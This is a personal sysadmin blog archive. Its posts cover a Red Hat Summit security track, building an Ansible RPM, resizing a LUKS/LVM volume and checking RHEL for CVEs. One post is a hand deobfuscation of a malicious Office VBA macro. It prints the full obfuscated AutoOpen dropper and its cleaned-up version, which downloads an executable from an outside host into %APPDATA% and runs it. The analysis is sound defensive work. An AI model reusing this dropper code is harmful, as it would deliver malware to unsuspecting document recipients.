Moving my blog to

I’ve decided it’s time to give my blog a better name.  While has served me well for a little over 7 years, it is a bit of a mouthful to communicate to someone.  So — I am now moving my blogging activities to  And as moving my blog doesn’t make much sense if I don’t actually use it – I will be looking to blog a bit more frequently (blogging more frequently than 18 month intervals is a pretty low goal to aim for).  So, please update your bookmarks and RSS readers to point to, and follow me on Twitter @rhmjs to get notified whenever I post a new entry.

Leave a comment

Compliance and the Cloud, at Red Hat Summit

For many, the discussion is not “should I use the public cloud?”; rather it is “how and when do I leverage the public cloud?”. This is not a boolean decision, there is no need to turn off your existing data center simply because you have decided to adopt the public cloud. Hybrid Cloud and Multi Cloud strategies are increasingly common — identify your subset of workloads that you consider reasonable for public cloud, determine if moving to a public cloud will provide cost benefits (e.g., periodic or “bursty” workloads), and expand your operation to the public cloud for just those workloads.

Generally, there are three concerns to be addressed in selecting workloads: cost, performance, and security/compliance.

Cost and performance requirements are fairly quantitative, and relatively easy to analyze.

But there is a real challenge in maintaining a consistent security and compliance posture across this expanded infrastructure. Whether moving 1 or 2 workloads to the public cloud or 90% of your infrastructure, the ability to maintain security patches, apply consistent access control, generate compliance reports, and detect and apply configuration changes is critical.

We have a great set of sessions lined up in our Security Track at Red Hat Summit this year, addressing these concerns and more. “Compliance, security automation, and remediation with Red Hat CloudForms, Red Hat Satellite, and Ansible Tower by Red Hat” will provide guidance on maintaining a consistent compliance posture across private and public cloud, “Identity management for cloud and hybrid cloud environments with Red Hat and Microsoft” will discuss maintaining uniform identity between Azure Active Directory Domain Services and your Red Hat Enterprise Linux systems, and “Middleware security: Authentication, authorization, and auditing services” will introduce our new Single Sign-On solution based on Keycloak for Federated Authorization across your applications, regardless of where they are hosted.

I will be blogging and tweeting (@rhmjs) all through Summit. And if you are joining us in San Francisco, please make sure to come find me at the Red Hat Booth! Hope to see you there!

Leave a comment

Red Hat Chief Architect, Northeast Commercial

So … this happened today:

Matt Smith – Chief Architect, Northeast Commercial
Matt will be taking on the role of Chief Architect for the Northeast team under Sean Spurrier. He has been at Red Hat for 3 years in an Account SA role most recently covering some of our larger Financial Services customers along with being the IDM SME team lead and resident security guru. He has had a great impact on the emerging technology and consulting business of the Northeast and last year won a Chairman’s award as well. He joined us from the University of Connecticut and lives with his wife, 4 children and log chopping machine in the hinterlands of Eastern Connecticut.

I gotta admit — I’ve never been more humbled.  Red Hat is an incredible organization, with incredible people and incredible goals.  To be able to make an impact in such an organization is truly rewarding, and to be recognized with such an opportunity is awesome.

Can you tell I enjoy working here?

Maybe you should too:



1 Comment

Deobfuscating malware by hand

Somehow, I became a proud new owner of a piece of (somewhat) malicious code tonight.  Once making sure it was properly neutered, and after running it through VirusTotal and being surprised by how few (9/55) engines were detecting it, I decided to take a look.

Sub HCYh58Llju(ByRef iKvmUvcYr3wp, ByVal Q3REKGitD, ByVal kwoeg8c)
 iKvmUvcYr3wp = Split(Q3REKGitD, kwoeg8c)
End Sub

Sub S1HL1_C(ByVal LL3FDJzJgC, ByVal cOdzspoHpj)
 On Error Resume Next
 xDyHfiQQsRQ8 = cOdzspoHpj.responseBody
 LL3FDJzJgC.Write xDyHfiQQsRQ8
End Sub

Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = StrReverse(StrReverse(StrReverse("m" & "d" & " " & "/")))
 Const KMKM = "km "
 Const CCCC = " c"

 Dim q7bPJ655QjSG
 HCYh58Llju q7bPJ655QjSG, StrReverse("|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS"), "|"

 Dim nPtKNIjU35IQ
 Set nPtKNIjU35IQ = CreateObject("W" & StrReverse("tpircS") & "." & StrReverse("llehS"))
 C4KAAHcn = nPtKNIjU35IQ.ExpandEnvironmentStrings(q7bPJ655QjSG(4))

 jnF1QSEGIA = Split(C4KAAHcn, "\")
 R9Z8D2tPkYNy = UBound(jnF1QSEGIA)
 nPtKNIjU35IQ.Run "c" & StrReverse(KMKM & CCCC & HUiu827TYRH) & StrReverse("rid") & " """ & Mid(C4KAAHcn, 1, Len(C4KAAHcn) - Len(jnF1QSEGIA(R9Z8D2tPkYNy))) & """", 0, True

 Set v8t0w6fxasM = CreateObject(q7bPJ655QjSG(1))
 v8t0w6fxasM.Open Chr$(71) + Chr$(69) + Chr$(84), q7bPJ655QjSG(3), False
 v8t0w6fxasM.setRequestHeader "Cache-Control", "no-cache, no-store"

 Set n7nUrIZKvU2A = CreateObject(q7bPJ655QjSG(2))
 n7nUrIZKvU2A.Type = 1
 Application.Run "S1HL1_C", n7nUrIZKvU2A, v8t0w6fxasM
 Application.Run "h2xPVFcahn", n7nUrIZKvU2A, C4KAAHcn
 nPtKNIjU35IQ.Run "c" & StrReverse(""" """" trats" & " c" & HUiu827TYRH) & C4KAAHcn & """", 0, False
End Sub

Function h2xPVFcahn(ByVal n7nUrIZKvU2ATMP, ByVal C4KAAHcnTMP)
 n7nUrIZKvU2ATMP.SaveToFile C4KAAHcnTMP, 2
End Function

Sub Workbook_Open()
 On Error Resume Next
End Sub

Oh noes .. it’s teh crypted!!!  No, of course not.  Someone just thought they’d be funny and obfuscate this to make it a bit tougher to figure out what they’ve done.  Because, you know, StrReverse(StrReverse(StrReverse(…))) is 3 times better than a single StrReverse!!

So anyway, sarcasm aside (yeah, right), this is nothing more difficult than the cryptoquote in your Sundary newspaper or the (really great!) puzzles at the end of every Gravity Falls episode.

So let’s get out the text editor and start doing some simple search and replace.

First — let’s remove all the silly StrReverse functions.  It’s pretty easy to pick out the most interesting, and reverse it from the CLI:

Please mentally ignore all occurrences of “<DONT_GO_HERE>” — I just injected them because I didn’t trust this blog to not automagically make those URLs clickable.

$ echo "|exe.tsohnvs\etadpUdnW\%ATADPPA%|exe.605ild/stsop/moc.34oledsmanilad//:ptth|maertS.BDODA|PTTHLMX.tfosorciM|llehS" | rev


Of course, this now makes it pretty obvious that the subroutine named “HCYh58Llju” is just taking a string delimited by “|” and splitting it up into an array — so do a quick “s/HCYh58Llju/splitter_func/” on the file, just to make it easier to read.

The rest of the steps are pretty easy to follow — just keep finding easy string concatenation or reversal, and do a search and replace on obfuscated names once you figure out what they do.  Here is the final result of my analysis:

//Sub splitter_func(ByRef splitted, ByVal urlstr, ByVal seperator)
// splitted = Split(urlstr, seperator)
//End Sub
Sub write_xmlhttp_response_to_stream_func(ByVal LL3FDJzJgC, ByVal xmlhttp_objTMP)
 On Error Resume Next
 xml_responsebody_obj = xmlhttp_objTMP.responseBody
 adodb_objTMP.Write xml_responsebody_obj
End Sub
Sub AutoOpen()
 On Error Resume Next
 Dim HUiu827TYRH
 HUiu827TYRH = "/ dm"
 Const KMKM = "km "
 Const CCCC = " c"
Dim splitted_data
// splitter_func splitted_data, "Shell|Microsoft.XMLHTTP|ADODB.Stream|http://dal<DONT_GO_HERE><DONT_GO_HERE>m/posts/dli506.exe|%APPDATA%\WndUpdate\svnhost.exe|", "|"
Dim wscript_shell_obj
 Set wscript_shell_obj = CreateObject("WScript.Shell")
 wndupd_location_str = wscript_shell_obj.ExpandEnvironmentStrings("%APPDATA%\WndUpdate\svnhost.exe")
wndupd_location_parts = Split(wndupd_location_str, "\")
 highest_index_of_wndupd_loc_parts = UBound(wndupd_location_parts)
#MJS Make a directory in APPDATA
 wscript_shell_obj.Run "cmd /cmkdir "%APPDATA%\WndUpdate\""", 0, True
Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
 xmlhttp_obj.Open "GET", "http://dal<DONT_GO_HERE>inamsdelo<DONT_GO_HERE>43.c<DONT_GO_HERE>om/posts/dli506.exe", False
 xmlhttp_obj.setRequestHeader "Cache-Control", "no-cache, no-store"
Set adodb_obj = CreateObject("ADODB.Stream")
 adodb_obj.Type = 1
 Application.Run "write_xmlhttp_response_to_stream_func", adodb_obj, xmlhttp_obj
 Application.Run "save_stream_to_file_func", adodb_obj, wndupd_location_str
 wscript_shell_obj.Run "cmd /cstart "%APPDATA%\WndUpdate\svnhost.exe""", 0, False
End Sub
Function save_stream_to_file_func(ByVal adodb_objTMP, ByVal wndupd_location_strTMP)
 adodb_objTMP.SaveToFile wndupd_location_strTMP, 2
End Function
Sub Workbook_Open()
 On Error Resume Next
End Sub


This was a stupid exercise.  All this script does is create a directory in %APPDATA%, downloads a file from a random site, names is svnhost.exe locally, and then executes that file.  Pretty straightforward stage 1 payload.  The real fun, of course, is in analyzing stage 2.  But I’ll leave that for the pros ….

Leave a comment

Building Ansible 2.0 RPM on Fedora 23

I want to use some of the new extras modules (especially virt_net and virt_pool), so here are my notes on building the Ansible 2.0 RPM for Fedora 23.

sudo dnf install asciidoc rpm-build python-devel
git clone git:// --recursive
cd ansible/
make rpm
sudo dnf -y install ./rpm-build/ansible-2.*.noarch.rpm

ansible --version

One note — it is possible I already installed some packages necessary for building Ansible, and so the list of packages I installed may not be sufficient.  If you stumble across any, please let me know and I will update this post.

Leave a comment

Resizing an LVM PV + LUKS volume on a live Fedora 23 system

I just installed Fedora 23 on a new laptop, happily clicking my way through the GUI installer.  The installer very nicely partitioned my disks to a small boot partition, and a larger LUKS-encrypted volune, and created an LVM PV from that LUKS-encrypted volume, then carved out several LVs for /, /home, etc.  Everything is up and running within 15 minutes, and I’ve started copying over my files from my old laptop.

Then … I decide to create a new LV to hold my VM images, and suddenly realize I forgot to tell the installer to use all available storage for my PV!  I see this:

fdisk -l
 Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
 Device Boot Start End Sectors Size Id Type
 /dev/sda1 * 2048 1026047 1024000 500M 83 Linux
 /dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

I have around 120GB of space where I could create a new PV … but I really want a single PV of 238 GiB.  And heck, this is a new laptop install, worst case is everything blows up and I lose an hour.

Fixing this was surprisingly easy!

** These steps may very well delete any and all data on your hard drive, and render your system unable to boot.  If you value your data, make backups.  Proceed with caution **

Adjust the partition boundary using fdisk

# fdisk /dev/sda

Welcome to fdisk (util-linux 2.27.1).
Command (m for help): p
Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
/dev/sda1 * 2048 1026047 1024000 500M 83 Linux
/dev/sda2 1026048 226492415 225466368 107.5G 83 Linux

Command (m for help): d 
Partition number (1,2, default 2): 2

Partition 2 has been deleted.

Command (m for help): n
Partition type
 p primary (1 primary, 0 extended, 3 free)
 e extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 
First sector (1026048-500118191, default 1026048): 
Last sector, +sectors or +size{K,M,G,T,P} (1026048-500118191, default 500118191): 

Created a new partition 2 of type 'Linux' and of size 238 GiB.

Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.

# partprobe -s
/dev/sda: msdos partitions 1 2

Adjust the LUKS volume size

cryptsetup resize luks-a522aeb6-2526-4868-82ba-c36b01dc5d53

Adjust the LVM PV size

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [107.51 GiB / 8.00 MiB free]
Total: 1 [107.51 GiB] / in use: 1 [107.51 GiB] / in no VG: 0 [0 ]

# pvresize /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53
Physical volume "/dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53" changed
1 physical volume(s) resized / 0 physical volume(s) not resized

# pvscan
PV /dev/mapper/luks-a522aeb6-2526-4868-82ba-c36b01dc5d53 VG fedora lvm2 [237.98 GiB / 130.48 GiB free]
Total: 1 [237.98 GiB] / in use: 1 [237.98 GiB] / in no VG: 0 [0 ]

And that’s it!  I now have a VG composed of a single PV occupying the entire drive!

Leave a comment

How to determine if your Red Hat Enterprise Linux 7 system is vulnerable to a specific CVE

Let’s say we are looking to determine if our system is vulnerable to Heartbleed or LogJam.

# ls /usr/lib64/*
/usr/lib64/ /usr/lib64/
# yum info openssl
Installed Packages
Name : openssl
Arch : x86_64
Epoch : 1
Version : 1.0.1e
Release : 42.el7_1.9
Size : 1.5 M
Repo : installed
From repo : rhel-7-server-rpms
Summary : Utilities from the general purpose cryptography library with TLS implementation
License : OpenSSL
Description : The OpenSSL toolkit provides support for secure communications between
 : machines. OpenSSL includes a certificate management tool and shared
 : libraries which provide various cryptographic algorithms and
 : protocols.

Note “Version” is 1.0.1e. But that denotes what version Red Hat based the relesae. Since that release, Red Hat has backported many future bugfixes, security fixes, etc, exposed by the “Release” value 42.el7_1.9.

Using Heartbleed (CVE-2014-0160) as the example (
“Red Hat Enterprise Linux 7 include OpenSSL version openssl-1.0.1e-34.el7 which includes a fix backported from openssl-1.0.1g”

Each specific CVE can be check directly on Red Hat’s site,

You can also check directly on the command line. For example, checking for Heartbleed you would use:

# yum updateinfo list installed --cve CVE-2014-0160

This will show any RPM packages installed that apply to Heartbleed. But note — nothing will return on a RHEL7 system, because the original RPM released with RHEL7 was not vulnerable, so no additiona package needed to be installed to fix it.

Logjam, though, is a little more interesting.

# yum updateinfo list installed --cve CVE-2015-4000
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-1:
RHSA-2015:1229 Critical/Sec. java-1.7.0-openjdk-headless-1:
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-sysinit-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-tools-3.19.1-3.el7_1.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el6_6.x86_64
RHSA-2015:1185 Moderate/Sec. nss-util-3.19.1-1.el7_1.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1.0.1e-30.el6_6.9.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-1:1.0.1e-42.el7_1.6.x86_64
RHSA-2015:1072 Moderate/Sec. openssl-libs-1:1.0.1e-42.el7_1.6.x86_64

Each of those RHSA’s addressed Logjam. You can get a lot more information by using:

# yum updateinfo info installed --cve CVE-2015-4000

Note the use of “installed” in these commands. This shows information only about packages that are already installed. If you remove “installed”, you will see information only about packages that /could/ be installed.

Leave a comment

Removing Thunderbird’s Titlebar in Gnome Shell

I spend most of my day in front of Google Chrome, Mozilla Thunderbird, and Gnome Terminal on my RHEL 7 desktop running Gnome Shell. Chrome’s ability to hide the system titlebar creates a pretty slick and efficient desktop, so I’ve been craving the same for Thunderbird. Luck (and a little bit of Google-fu) just brought me to the Pixel Saver Gnome Shell extension. Works like a champ, thank you @deadalnix !

Leave a comment


Adding to my collection of BSOD’s I’ve seen while traveling, I saw this one at Heathrow Airport earlier today.


I find it strangely interesting that the 90° rotation isn’t maintained by the BSOD …

Leave a comment


Ok, so it’s happened.  I am now using Twitter professionally.  Come follow me @rhmjs!

Leave a comment